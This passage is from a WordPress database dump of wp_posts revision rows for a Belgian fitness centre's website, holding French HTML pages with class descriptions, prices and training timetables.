15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2>Les cours ?</h2>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:28:10', '2013-06-16 14:28:10', '', 11, 'http://www.crosstrainingcenter.be/?p=123', 0, 'revision', '', 0),
(219, 1, '2013-07-03 18:25:11', '2013-07-03 18:25:11', '<h2>Prix</h2>', 'Prix', '', 'inherit', 'open', 'open', '', '214-revision-2', '', '', '2013-07-03 18:25:11', '2013-07-03 18:25:11', '', 214, 'http://www.crosstrainingcenter.be/?p=219', 0, 'revision', '', 0),
(124, 1, '2013-06-16 14:33:05', '2013-06-16 14:33:05', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n\r\n&nbsp;\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2>Les cours :</h2>\r\nEn semaine<br>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">&nbsp;</td>\r\n<td style=\"border: 0px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">&nbsp;</td>\r\n<td style=\"border: 0px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">&nbsp;</td>\r\n<td style=\"border: 0px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">&nbsp;</td>\r\n<td style=\"border: 0px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">&nbsp;</td>\r\n<td style=\"border: 0px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:33:05', '2013-06-16 14:33:05', '', 11, 'http://www.crosstrainingcenter.be/?p=124', 0, 'revision', '', 0),
(125, 1, '2013-06-16 14:34:31', '2013-06-16 14:34:31', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n\r\n&nbsp;\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2>Les cours :</h2>\r\nEn semaine<br>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">&nbsp;</td>\r\n<td style=\"border: 0px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">&nbsp;</td>\r\n<td style=\"border: 0px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">&nbsp;</td>\r\n<td style=\"border: 0px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">&nbsp;</td>\r\n<td style=\"border: 0px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">&nbsp;</td>\r\n<td style=\"border: 0px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:34:31', '2013-06-16 14:34:31', '', 11, 'http://www.crosstrainingcenter.be/?p=125', 0, 'revision', '', 0),
(206, 1, '2013-07-03 18:02:08', '2013-07-03 18:02:08', '<h2>Team Training :</h2>\r\nLes séances sont programmées selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"><strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>\r\nDuo Training :</h2>\r\nUniquement sur rdv\r\n\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>Personal Training :</h2>\r\nUniquement sur rdv\r\n\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>Coatching nutritionnel :</h2>\r\nUniquement sur rdv\r\n\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 18:02:08', '2013-07-03 18:02:08', '', 11, 'http://www.crosstrainingcenter.be/?p=206', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(205, 1, '2013-07-03 17:58:05', '2013-07-03 17:58:05', '<h2>Team Training :</h2>\r\nLes séances sont programmées selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\">\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n\r\n\r\n<br><br>\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les 